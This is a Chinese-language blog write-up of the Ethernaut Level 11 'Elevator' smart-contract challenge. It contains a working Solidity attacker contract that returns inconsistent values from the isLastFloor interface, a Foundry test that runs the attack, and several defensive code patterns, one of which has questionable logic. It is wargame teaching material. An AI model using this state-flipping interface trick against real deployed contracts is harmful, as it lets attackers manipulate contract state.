<!DOCTYPE html>
<html lang="zh-CN">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no">

    
      <link rel="icon" href="/favicon.png" />
    

    <title>
        
          Ethernaut Level 11: Elevator - 接口实现攻击 - Kent&#39;s Blog
        
    </title>

    <!-- Spectre.css framework -->
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/spectre.css/0.5.9/spectre.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/spectre.css/0.5.9/spectre-exp.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/spectre.css/0.5.9/spectre-icons.min.css">

    <!-- theme css & js -->
    
<link rel="stylesheet" href="/css/book.css">

    
<script src="/js/book.js"></script>


    <!-- tocbot -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/tocbot/4.4.2/tocbot.min.js"></script>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/tocbot/4.4.2/tocbot.css">
    
    <!-- katex -->
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.10.0/katex.min.css">

    
    
<script src="https://cdnjs.cloudflare.com/ajax/libs/zooming/2.1.1/zooming.min.js"></script>
<script>
document.addEventListener('DOMContentLoaded', function () {
    const zooming = new Zooming()
    zooming.listen('.book-content img')
})
</script>

<meta name="generator" content="Hexo 7.3.0"></head>

<body>

<div class="book-container">
  <div class="book-sidebar">
    <div class="book-brand">
  <a href="/">
    <img src="/favicon.png">
    <span>KENT&#39;S BLOG</span>
  </a>
</div>
    <div id="menu" class="book-menu hide">
  <h2 id="主要内容"><a href="#主要内容" class="headerlink" title="主要内容"></a>主要内容</h2><ul>
<li><a href="/">首页</a></li>
<li><a href="/archives">文章归档</a></li>
<li><a href="/categories">分类浏览</a> </li>
<li><a href="/tags">标签云</a></li>
</ul>
<h2 id="Web3-0-专区"><a href="#Web3-0-专区" class="headerlink" title="Web3.0 专区"></a>Web3.0 专区</h2><ul>
<li><a href="/categories/Dapp">Dapp 开发</a></li>
<li><a href="/tags/solidity">智能合约</a></li>
<li><a href="/tags/blockchain">区块链技术</a></li>
<li><a href="/categories/Web3%E5%AE%89%E5%85%A8">Web3安全</a></li>
</ul>
<h2 id="Ethernaut-Foundry-系列-🛡️"><a href="#Ethernaut-Foundry-系列-🛡️" class="headerlink" title="Ethernaut&amp;Foundry 系列 🛡️"></a>Ethernaut&amp;Foundry 系列 🛡️</h2><ul>
<li><a href="/2025/01/25/ethernaut-foundry-solutions-series/">系列总览</a></li>
<li><a href="/2025/01/25/foundry-setup-guide/">Foundry 环境搭建</a></li>
<li><a href="/2025/01/25/ethernaut-level-01-fallback/">Level 1: Fallback</a></li>
<li><a href="/2025/01/25/ethernaut-level-02-fallout/">Level 2: Fallout</a></li>
<li><a href="/2025/01/25/ethernaut-level-03-coinflip/">Level 3: Coin Flip</a></li>
<li><a href="/2025/01/25/ethernaut-level-04-telephone/">Level 4: Telephone</a></li>
<li><a href="/2025/01/25/ethernaut-level-05-token/">Level 5: Token</a></li>
<li><a href="/2025/01/25/ethernaut-level-06-delegation/">Level 6: Delegation</a></li>
<li><a href="/2025/01/25/ethernaut-level-07-force/">Level 7: Force</a></li>
<li><a href="/2025/01/25/ethernaut-level-08-vault/">Level 8: Vault</a></li>
<li><a href="/2025/01/25/ethernaut-level-09-king/">Level 9: King</a></li>
<li><a href="/2025/01/25/ethernaut-level-10-reentrancy/">Level 10: Re-entrancy</a></li>
<li><a href="/2025/01/25/ethernaut-level-11-elevator/">Level 11: Elevator</a></li>
<li><a href="/2025/01/25/ethernaut-level-12-privacy/">Level 12: Privacy</a></li>
<li><a href="/2025/01/25/ethernaut-level-13-gatekeeper-one/">Level 13: Gatekeeper One</a></li>
<li><a href="/2025/01/25/ethernaut-level-14-gatekeeper-two/">Level 14: Gatekeeper Two</a></li>
<li><a href="/2025/01/25/ethernaut-level-15-naught-coin/">Level 15: Naught Coin</a></li>
<li><a href="/2025/01/25/ethernaut-level-16-preservation/">Level 16: Preservation</a></li>
<li><a href="/2025/01/25/ethernaut-level-17-recovery/">Level 17: Recovery</a></li>
<li><a href="/2025/01/25/ethernaut-level-18-magic-number/">Level 18: Magic Number</a></li>
<li><a href="/2025/01/25/ethernaut-level-19-alien-codex/">Level 19: Alien Codex</a></li>
<li><a href="/2025/01/25/ethernaut-level-20-denial/">Level 20: Denial</a></li>
<li><a href="/2025/01/25/ethernaut-level-21-shop/">Level 21: Shop</a></li>
<li><a href="/2025/01/25/ethernaut-level-22-dex/">Level 22: Dex</a></li>
<li><a href="/2025/01/25/ethernaut-level-23-dex-two/">Level 23: Dex Two</a></li>
<li><a href="/2025/01/25/ethernaut-level-24-puzzle-wallet/">Level 24: Puzzle Wallet</a></li>
<li><a href="/2025/01/25/ethernaut-level-25-motorbike/">Level 25: Motorbike</a></li>
</ul>
<h2 id="个人页面"><a href="#个人页面" class="headerlink" title="个人页面"></a>个人页面</h2><ul>
<li><a href="/about">关于我</a></li>
<li><a href="/repository">项目展示</a></li>
<li><a href="/books">书单推荐</a></li>
<li><a href="/links">友情链接</a></li>
</ul>

</div>


<script src="/js/book-menu.js"></script>

  </div>

  <div class="sidebar-toggle" onclick="sidebar_toggle()" onmouseover="add_inner()" onmouseleave="remove_inner()">
  <div class="sidebar-toggle-inner"></div>
</div>

<script>
function add_inner() {
  let inner = document.querySelector('.sidebar-toggle-inner')
  inner.classList.add('show')  
}

function remove_inner() {
  let inner = document.querySelector('.sidebar-toggle-inner')
  inner.classList.remove('show')
}

function sidebar_toggle() {
    let sidebar_toggle = document.querySelector('.sidebar-toggle')
    let sidebar = document.querySelector('.book-sidebar')
    let content = document.querySelector('.off-canvas-content')
    if (sidebar_toggle.classList.contains('extend')) { // show
        sidebar_toggle.classList.remove('extend')
        sidebar.classList.remove('hide')
        content.classList.remove('extend')
    }
    else { // hide
        sidebar_toggle.classList.add('extend')
        sidebar.classList.add('hide')
        content.classList.add('extend')
    }
}
</script>

  <div class="off-canvas-content">
    <div class="columns">
      <div class="column col-10 col-lg-12">
        <div class="book-navbar">
          <!-- For Responsive Layout -->

<header class="navbar">
  <section class="navbar-section">
    <a onclick="open_sidebar()">
      <i class="icon icon-menu"></i>
    </a>
  </section>
</header>

        </div>
        <div class="book-content">
          <div class="book-post">
  <h1 id="🎯-Ethernaut-Level-11-Elevator-接口实现攻击"><a href="#🎯-Ethernaut-Level-11-Elevator-接口实现攻击" class="headerlink" title="🎯 Ethernaut Level 11: Elevator - 接口实现攻击"></a>🎯 Ethernaut Level 11: Elevator - 接口实现攻击</h1><blockquote>
<p><strong>关卡链接</strong>: <a target="_blank" rel="noopener" href="https://ethernaut.openzeppelin.com/level/11">Ethernaut Level 11 - Elevator</a><br><strong>攻击类型</strong>: 接口实现攻击<br><strong>难度</strong>: ⭐⭐⭐☆☆</p>
</blockquote>
<h2 id="📋-挑战目标"><a href="#📋-挑战目标" class="headerlink" title="📋 挑战目标"></a>📋 挑战目标</h2><p>目的是使电梯达到最顶层，即使题目合约的 <code>top</code> 为 <code>true</code>。关键在于理解接口定义与实际实现的差别，以及如何利用这个差别进行攻击。</p>
<p><img src="https://ethernaut.openzeppelin.com/imgs/BigLevel11.svg" alt="Elevator Requirements"></p>
<h2 id="🔍-漏洞分析"><a href="#🔍-漏洞分析" class="headerlink" title="🔍 漏洞分析"></a>🔍 漏洞分析</h2><h3 id="接口的安全风险"><a href="#接口的安全风险" class="headerlink" title="接口的安全风险"></a>接口的安全风险</h3><p>本关卡重在考验我们对智能合约接口的认知程度：</p>
<ul>
<li><strong>接口定义函数签名，但不定义它们的逻辑</strong></li>
<li>这是一种无需知道实现细节就可以与其他合约交互的方法</li>
<li>但也意味着攻击者可以控制接口的实现逻辑</li>
</ul>
<h3 id="关键漏洞代码"><a href="#关键漏洞代码" class="headerlink" title="关键漏洞代码"></a>关键漏洞代码</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">function goTo(uint _floor) public &#123;</span><br><span class="line">    Building building = Building(msg.sender);</span><br><span class="line"></span><br><span class="line">    if (!building.isLastFloor(_floor)) &#123;</span><br><span class="line">      floor = _floor;</span><br><span class="line">      top = building.isLastFloor(floor);  // 第二次调用！</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="攻击向量"><a href="#攻击向量" class="headerlink" title="攻击向量"></a>攻击向量</h3><p>在 <code>goTo</code> 函数中，<code>isLastFloor</code> 被调用两次：</p>
<ol>
<li><strong>第一次调用</strong>：必须返回 <code>false</code>，否则无法进入修改 <code>top</code> 的逻辑</li>
<li><strong>第二次调用</strong>：我们可以让它返回 <code>true</code> 来设置 <code>top = true</code></li>
</ol>
<p>我们可以通过创建一个 <code>isLastFloor()</code> 来利用这一点，它将第一次返回 <code>false</code>，第二次返回 <code>true</code>。</p>
<h2 id="💻-Foundry-实现"><a href="#💻-Foundry-实现" class="headerlink" title="💻 Foundry 实现"></a>💻 Foundry 实现</h2><h3 id="攻击合约代码"><a href="#攻击合约代码" class="headerlink" title="攻击合约代码"></a>攻击合约代码</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><span class="line">// SPDX-License-Identifier: MIT</span><br><span class="line">pragma solidity ^0.8.0;</span><br><span class="line"></span><br><span class="line">import &quot;forge-std/Test.sol&quot;;</span><br><span class="line">import &quot;../src/Ethernaut.sol&quot;;</span><br><span class="line">import &quot;../src/levels/ElevatorFactory.sol&quot;;</span><br><span class="line"></span><br><span class="line">interface Building &#123;</span><br><span class="line">    function isLastFloor(uint) external returns (bool);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">contract ElevatorAttacker is Building &#123;</span><br><span class="line">    Elevator instance;</span><br><span class="line">    bool top = false;</span><br><span class="line"></span><br><span class="line">    constructor(address _elevator) &#123;</span><br><span class="line">        instance = Elevator(_elevator);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    // 关键：状态变化的接口实现</span><br><span class="line">    function isLastFloor(uint _floor) external override returns (bool) &#123;</span><br><span class="line">        top = !top;  // 第一次调用时 top 变为 true，第二次变为 false</span><br><span class="line">        return !top; // 第一次返回 false，第二次返回 true</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function attack(uint _floor) public &#123;</span><br><span class="line">        instance.goTo(_floor);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">contract ElevatorTest is Test &#123;</span><br><span class="line">    Ethernaut ethernaut;</span><br><span class="line">    ElevatorFactory elevatorFactory;</span><br><span class="line">    </span><br><span class="line">    function setUp() public &#123;</span><br><span class="line">        ethernaut = new Ethernaut();</span><br><span class="line">        elevatorFactory = new ElevatorFactory();</span><br><span class="line">        ethernaut.registerLevel(elevatorFactory);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    function testElevatorExploit() public &#123;</span><br><span class="line">        // 创建关卡实例</span><br><span class="line">        address levelInstance = ethernaut.createLevelInstance(elevatorFactory);</span><br><span class="line">        Elevator instance = Elevator(levelInstance);</span><br><span class="line">        </span><br><span class="line">        // 检查初始状态</span><br><span class="line">        assertEq(instance.top(), false);</span><br><span class="line">        assertEq(instance.floor(), 0);</span><br><span class="line">        </span><br><span class="line">        // 部署攻击合约</span><br><span class="line">        ElevatorAttacker attacker = new ElevatorAttacker(levelInstance);</span><br><span class="line">        </span><br><span class="line">        // 执行攻击</span><br><span class="line">        attacker.attack(1);</span><br><span class="line">        </span><br><span class="line">        // 验证攻击成功</span><br><span class="line">        assertEq(instance.top(), true);</span><br><span class="line">        assertEq(instance.floor(), 1);</span><br><span class="line">        </span><br><span class="line">        // 提交关卡</span><br><span class="line">        bool levelSuccessfullyPassed = ethernaut.submitLevelInstance(</span><br><span class="line">            payable(levelInstance)</span><br><span class="line">        );</span><br><span class="line">        assert(levelSuccessfullyPassed);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="关键攻击步骤"><a href="#关键攻击步骤" class="headerlink" title="关键攻击步骤"></a>关键攻击步骤</h3><ol>
<li><strong>实现 Building 接口</strong>：创建一个合约实现 <code>Building</code> 接口</li>
<li><strong>状态变化逻辑</strong>：在 <code>isLastFloor()</code> 中实现状态变化</li>
<li><strong>调用 goTo 函数</strong>：通过攻击合约调用 <code>goTo()</code></li>
<li><strong>验证结果</strong>：检查 <code>top</code> 是否为 <code>true</code></li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">// 状态变化的关键实现</span><br><span class="line">function isLastFloor(uint _floor) external override returns (bool) &#123;</span><br><span class="line">    top = !top;  // 切换状态</span><br><span class="line">    return !top; // 第一次返回 false，第二次返回 true</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="🛡️-防御措施"><a href="#🛡️-防御措施" class="headerlink" title="🛡️ 防御措施"></a>🛡️ 防御措施</h2><h3 id="1-避免多次调用外部函数"><a href="#1-避免多次调用外部函数" class="headerlink" title="1. 避免多次调用外部函数"></a>1. 避免多次调用外部函数</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">// ❌ 不安全：多次调用外部函数</span><br><span class="line">contract VulnerableElevator &#123;</span><br><span class="line">    function goTo(uint _floor) public &#123;</span><br><span class="line">        Building building = Building(msg.sender);</span><br><span class="line">        </span><br><span class="line">        if (!building.isLastFloor(_floor)) &#123;  // 第一次调用</span><br><span class="line">            floor = _floor;</span><br><span class="line">            top = building.isLastFloor(floor);  // 第二次调用！</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">// ✅ 安全：只调用一次并缓存结果</span><br><span class="line">contract SecureElevator &#123;</span><br><span class="line">    function goTo(uint _floor) public &#123;</span><br><span class="line">        Building building = Building(msg.sender);</span><br><span class="line">        </span><br><span class="line">        bool isLast = building.isLastFloor(_floor);  // 只调用一次</span><br><span class="line">        </span><br><span class="line">        if (!isLast) &#123;</span><br><span class="line">            floor = _floor;</span><br><span class="line">            top = isLast;  // 使用缓存的结果</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="2-使用-view-函数"><a href="#2-使用-view-函数" class="headerlink" title="2. 使用 view 函数"></a>2. 使用 view 函数</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">// ✅ 使用 view 函数防止状态改变</span><br><span class="line">interface Building &#123;</span><br><span class="line">    function isLastFloor(uint) external view returns (bool);  // view 修饰符</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">contract SecureElevator &#123;</span><br><span class="line">    function goTo(uint _floor) public &#123;</span><br><span class="line">        Building building = Building(msg.sender);</span><br><span class="line">        </span><br><span class="line">        if (!building.isLastFloor(_floor)) &#123;</span><br><span class="line">            floor = _floor;</span><br><span class="line">            top = building.isLastFloor(floor);  // view 函数保证一致性</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="3-使用白名单机制"><a href="#3-使用白名单机制" class="headerlink" title="3. 使用白名单机制"></a>3. 使用白名单机制</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">contract SecureElevator &#123;</span><br><span class="line">    mapping(address =&gt; bool) public approvedBuildings;</span><br><span class="line">    address public owner;</span><br><span class="line">    </span><br><span class="line">    modifier onlyApprovedBuilding() &#123;</span><br><span class="line">        require(approvedBuildings[msg.sender], &quot;Unauthorized building&quot;);</span><br><span class="line">        _;</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    function addApprovedBuilding(address building) public &#123;</span><br><span class="line">        require(msg.sender == owner);</span><br><span class="line">        approvedBuildings[building] = true;</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    function goTo(uint _floor) public onlyApprovedBuilding &#123;</span><br><span class="line">        // 安全逻辑</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="4-实现内部逻辑"><a href="#4-实现内部逻辑" class="headerlink" title="4. 实现内部逻辑"></a>4. 实现内部逻辑</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">contract SecureElevator &#123;</span><br><span class="line">    uint public floor;</span><br><span class="line">    bool public top;</span><br><span class="line">    uint public topFloor = 10;  // 定义最高层</span><br><span class="line">    </span><br><span class="line">    function goTo(uint _floor) public &#123;</span><br><span class="line">        require(_floor &lt;= topFloor, &quot;Floor too high&quot;);</span><br><span class="line">        </span><br><span class="line">        floor = _floor;</span><br><span class="line">        top = (_floor == topFloor);  // 内部判断逻辑</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="🔧-相关工具和技术"><a href="#🔧-相关工具和技术" class="headerlink" title="🔧 相关工具和技术"></a>🔧 相关工具和技术</h2><h3 id="接口安全检测"><a href="#接口安全检测" class="headerlink" title="接口安全检测"></a>接口安全检测</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">// 检测接口实现的一致性</span><br><span class="line">contract InterfaceChecker &#123;</span><br><span class="line">    function checkConsistency(address building, uint floor) public &#123;</span><br><span class="line">        Building b = Building(building);</span><br><span class="line">        </span><br><span class="line">        // 多次调用检查一致性</span><br><span class="line">        bool result1 = b.isLastFloor(floor);</span><br><span class="line">        bool result2 = b.isLastFloor(floor);</span><br><span class="line">        </span><br><span class="line">        require(result1 == result2, &quot;Inconsistent interface implementation&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="合约分析工具"><a href="#合约分析工具" class="headerlink" title="合约分析工具"></a>合约分析工具</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 使用 Slither 检测接口安全问题</span></span><br><span class="line">slither . --detect external-function</span><br><span class="line"></span><br><span class="line"><span class="comment"># 使用 Mythril 分析</span></span><br><span class="line">Myth analyze &lt;contract.sol&gt; --execution-timeout 60</span><br></pre></td></tr></table></figure>

<h2 id="🎯-总结"><a href="#🎯-总结" class="headerlink" title="🎯 总结"></a>🎯 总结</h2><p><strong>核心概念</strong>:</p>
<ul>
<li>接口是一种无需知道实现细节就可以与其他合约交互的方式</li>
<li>但永远不要盲目相信它们！</li>
<li>多次调用外部函数可能产生不一致的结果</li>
</ul>
<p><strong>攻击向量</strong>:</p>
<ul>
<li>实现恶意的接口逻辑</li>
<li>利用多次调用之间的状态变化</li>
<li>操纵函数返回值以达到攻击目的</li>
</ul>
<p><strong>防御策略</strong>:</p>
<ul>
<li>只调用一次外部函数并缓存结果</li>
<li>使用 <code>view</code> 函数修饰符防止状态改变</li>
<li>实现白名单机制控制访问</li>
<li>尽可能使用内部逻辑而不依赖外部实现</li>
</ul>

</div>


  <div class="book-comments">
    




  </div>



<script src="/js/book-post.js"></script>

        </div>
      </div>
      <div class="column col-2 hide-lg">
        <div class="book-post-info">
  
    <div class="book-post-meta">

  <div class="author">

    <!-- Author image -->
    <div class="author-img">
      
        <figure
          class="avatar avatar-lg"
          data-initial="K"
          style="background-color: #3b4351;">
        </figure>
      
    </div>

    <!-- Author title -->
    <div class="author-title">
      <div>Kent</div>
      <div>2025-01-25</div>
    </div>
  </div>

  
    <div class="divider"></div>

    <div class="link">
      <a class="category-link" href="/categories/Ethernaut-%E7%B3%BB%E5%88%97/">Ethernaut 系列</a> <a class="category-link" href="/categories/Ethernaut-%E7%B3%BB%E5%88%97/%E8%BF%9B%E9%98%B6%E6%94%BB%E5%87%BB%E7%AF%87-11-20/">进阶攻击篇 (11-20)</a>

      <a class="tag-none-link" href="/tags/Ethernaut/" rel="tag">#Ethernaut</a> <a class="tag-none-link" href="/tags/Foundry/" rel="tag">#Foundry</a> <a class="tag-none-link" href="/tags/Solidity/" rel="tag">#Solidity</a> <a class="tag-none-link" href="/tags/%E6%8E%A5%E5%8F%A3%E5%AE%9E%E7%8E%B0%E6%94%BB%E5%87%BB/" rel="tag">#接口实现攻击</a> <a class="tag-none-link" href="/tags/%E6%99%BA%E8%83%BD%E5%90%88%E7%BA%A6%E5%AE%89%E5%85%A8/" rel="tag">#智能合约安全</a> <a class="tag-none-link" href="/tags/%E6%99%BA%E8%83%BD%E5%90%88%E7%BA%A6%E6%8E%A5%E5%8F%A3/" rel="tag">#智能合约接口</a> <a class="tag-none-link" href="/tags/%E7%8A%B6%E6%80%81%E6%93%8D%E7%BA%B5/" rel="tag">#状态操纵</a>
    </div>
    
  

  <div class="divider"></div>
</div>
  

  <div class="book-tocbot">
</div>
<div class="book-tocbot-menu">
  <a class="book-toc-expand" onclick="expand_toc()">Expand all</a>
  <a onclick="go_top()">Back to top</a>
  <a onclick="go_bottom()">Go to bottom</a>
</div>


<script src="/js/book-toc.js"></script>

</div>
      </div>
    </div>
  </div>
  
  <a class="off-canvas-overlay" onclick="hide_canvas()"></a>
</div>

</body>
</html>


<script src="/js/book.js"></script>
